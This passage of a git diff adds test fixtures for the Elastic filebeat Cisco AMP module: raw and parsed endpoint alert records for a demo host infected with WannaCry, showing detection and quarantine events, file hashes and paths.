+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json new file mode 100644 index 00000000000..a8bcab1df6e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp6.ndjson.log-expected.json @@ -0,0 +1,3114 @@ +[ + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847664", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847663", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1193, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847662", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2379, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847661", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 3572, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847659", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 4765, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847657", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 5950, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814973", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 572000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7136, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 120000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 8409, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 1008, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 73000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9938, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814968", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 26000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 11210, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847660", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12488, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 13608, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14728, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229327140847671", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 870000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 15848, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847666", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 17121, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": "ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 5748, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 667000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18745, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4772, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847656", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 28000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": 